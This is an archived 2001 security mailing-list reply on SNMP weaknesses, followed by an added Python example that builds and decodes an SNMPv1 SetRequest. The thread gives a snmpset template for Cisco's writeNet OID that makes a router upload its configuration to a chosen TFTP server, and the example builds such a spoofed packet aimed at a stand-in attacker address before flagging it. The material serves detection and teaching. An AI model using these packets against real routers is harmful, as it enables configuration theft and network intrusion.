Re: snmp vulnerablities

From: Ron Russell (ronat_private)
Date: Tue Jul 17 2001 - 11:14:19 PDT


    But in order to spoof the source IP address an attacker would need to know
    which source IP address would make it through the ACL...  And an attacker
    would also have to determine by an external scan that a particular target is
    susceptible to SNMP attacks BEFORE trying to get through the ACL.
    
    And you are 100% correct on the SNMP being sent in clear-text.  Anyone have
    any info on how SNMPv2 could provide a more secure SNMP environment?
    
    And if there is an unauthorized sniffer in your environment then all bets
    are off.
    
    Ron Russell - MCSE, CCNA, CNE
    480-6-Buddha
    Silicon Buddha LLC
    Enlightened Network Services
    www.siliconbuddha.com
    Offering Free Vulnerability Assessments from the deserts of Phoenix Arizona
    ----- Original Message -----
    From: "woody weaver" <woody.weaverat_private>
    To: "'Ron Russell'" <ronat_private>
    Cc: <pen-testat_private>
    Sent: Monday, July 16, 2001 4:50 PM
    Subject: RE: snmp vulnerablities
    
    
    
    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
    On Monday, July 16, 2001 3:01 PM, Ron Russell wrote:
    [...]
    > And the activity could have been prevented by proper use of
    > ACLs,
    
    This is not an easy task.  Because UDP is stateless, spoofing is
    fairly trivial.  Particularly for the snmp set approach you mention
    -- the format is
    $SNMPSET $TARGET $COMMUNITY .1.3.6.1.4.1.9.2.1.55.$MYIP s $CONFIG
    
    where $MYIP is the IP address of the tftp server.  Consequently, one
    can spoof the snmp set as coming from that trusted host -- the ACL
    has to reach into the data portion of the packet to prevent the tftp
    occurring.  It's not clear to me where the original penetration test
    was coming from, but if it was from a portion of the network where
    detecting spoofed addresses is not easy, then you have few options.
    
    > and the
    > proper configuration of SNMP (not using easily guessable
    > strings).
    
    I'm not sure this is especially helpful; SNMP is sent in the clear,
    of course, so the strings can be observed in transit and the game is up.
    Also, dictionary attacks are straightforward, since logging of snmp
    traffic seems to be rarely done.
    
    [...]
    
    --woody
    
    -----BEGIN PGP SIGNATURE-----
    Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>
    
    iQA/AwUBO1N9xaWr4+fi694gEQL8gwCgg5Q7huPhA+yCUuwFjAkTHcxJ/fAAoKVb
    RweCZ7evjZ29a+RgvtPB2m1r
    =cqIf
    -----END PGP SIGNATURE-----
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
    Service For more information on SecurityFocus' SIA service which
    automatically alerts you to the latest security vulnerabilities please see:
    https://alerts.securityfocus.com/
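
    Added example (not code from either poster or from the list): the SNMPv1
    SetRequest woody describes, built and then decoded the way a filter would
    have to decode it. The OID from the post, .1.3.6.1.4.1.9.2.1.55, is Cisco's
    writeNet object, whose instance suffix is the TFTP server address and
    whose string value is the filename to upload the running config to. The
    point of the example is that the IP-header source (what an ACL checks, and
    what a UDP sender can forge) and the TFTP destination (buried in the OID
    suffix) are different fields; only a parser that reaches into the data
    portion can see the second one. Pure-Python BER, no scapy or pysnmp. The
    addresses 10.0.0.5 (the "trusted NMS") and 192.0.2.10 (the attacker's TFTP
    server), the community string and the filename are constructed for the demo.

```python
# Added example: encode/decode SNMPv1 and flag writeNet SetRequests.
# Not from the list post. Addresses, community and filename are made up.

WRITENET_OID = "1.3.6.1.4.1.9.2.1.55"   # Cisco writeNet: config -> tftp
GET_REQUEST, SET_REQUEST = 0xA0, 0xA3   # SNMPv1 PDU context tags


def _ber_len(n):
    """BER length field, short or long form."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag, body):
    return bytes([tag]) + _ber_len(len(body)) + body


def _int(v):
    """Minimal two's-complement INTEGER."""
    return _tlv(0x02, v.to_bytes(v.bit_length() // 8 + 1, "big", signed=True))


def _oid(dotted):
    ids = [int(x) for x in dotted.strip(".").split(".")]
    out = bytearray([ids[0] * 40 + ids[1]])
    for sub in ids[2:]:                  # base-128, high bit = continuation
        chunk = [sub & 0x7F]
        sub >>= 7
        while sub:
            chunk.append(0x80 | (sub & 0x7F))
            sub >>= 7
        out += bytes(reversed(chunk))
    return _tlv(0x06, bytes(out))


def build_snmpv1(community, pdu_tag, oid, value=None, request_id=1):
    """SNMPv1 message with one varbind; value None encodes NULL (a Get)."""
    val = _tlv(0x05, b"") if value is None else _tlv(0x04, value.encode())
    varbinds = _tlv(0x30, _tlv(0x30, _oid(oid) + val))
    pdu = _tlv(pdu_tag, _int(request_id) + _int(0) + _int(0) + varbinds)
    return _tlv(0x30, _int(0) + _tlv(0x04, community.encode()) + pdu)


def _read_tlv(buf, pos):
    """Return (tag, body, next_pos) for the element starting at pos."""
    tag, ln = buf[pos], buf[pos + 1]
    pos += 2
    if ln & 0x80:                        # long form: ln & 0x7F length bytes
        n = ln & 0x7F
        ln = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + ln], pos + ln


def _dec_oid(body):
    ids, v = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        v = (v << 7) | (b & 0x7F)
        if not b & 0x80:
            ids.append(v)
            v = 0
    return ".".join(map(str, ids))


def parse_snmpv1(datagram):
    """Decode version, community, PDU type and varbinds from a UDP payload."""
    _, msg, _ = _read_tlv(datagram, 0)
    _, ver, pos = _read_tlv(msg, 0)
    _, comm, pos = _read_tlv(msg, pos)
    pdu_tag, pdu, _ = _read_tlv(msg, pos)
    _, rid, pos = _read_tlv(pdu, 0)
    _, _, pos = _read_tlv(pdu, pos)       # error-status
    _, _, pos = _read_tlv(pdu, pos)       # error-index
    _, vbl, _ = _read_tlv(pdu, pos)
    varbinds, pos = [], 0
    while pos < len(vbl):
        _, vb, pos = _read_tlv(vbl, pos)
        _, oid, vpos = _read_tlv(vb, 0)
        vtag, val, _ = _read_tlv(vb, vpos)
        varbinds.append((_dec_oid(oid), vtag, val))
    return {"version": int.from_bytes(ver, "big", signed=True),
            "community": comm.decode("latin-1"),
            "request_id": int.from_bytes(rid, "big", signed=True),
            "pdu_tag": pdu_tag, "varbinds": varbinds}


def inspect_datagram(src_ip, datagram):
    """Flag a SetRequest against writeNet. src_ip is the (forgeable) IP header
    source; the TFTP destination comes from the OID suffix, the only place it
    appears and a field an IP-layer ACL never looks at."""
    msg = parse_snmpv1(datagram)
    if msg["pdu_tag"] != SET_REQUEST:
        return None
    for oid, _tag, val in msg["varbinds"]:
        if oid.startswith(WRITENET_OID + "."):
            return {"src_ip": src_ip, "community": msg["community"],
                    "tftp_server": oid[len(WRITENET_OID) + 1:],
                    "filename": val.decode("latin-1")}
    return None


if __name__ == "__main__":
    # Constructed demo: IP header claims the NMS the ACL trusts, but the
    # config is directed to the attacker's TFTP server inside the OID.
    pkt = build_snmpv1("private", SET_REQUEST, WRITENET_OID + ".192.0.2.10",
                       "router.cfg", request_id=42)
    print(inspect_datagram("10.0.0.5", pkt))
```

    Running it prints an alert naming both addresses: the 10.0.0.5 the packet
    claims to come from and the 192.0.2.10 the router would actually send its
    configuration to. Nothing in the IP or UDP header distinguishes this
    datagram from a legitimate one from the NMS, which is why a source-address
    ACL does not help and why the check has to decode the ASN.1 payload. The
    same parser also gives you the logging woody notes is rarely done: every
    community string seen on the wire, and every Set, with the source that
    claimed it.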
    
    
    
    



    This archive was generated by hypermail 2b30 : Tue Jul 17 2001 - 15:02:08 PDT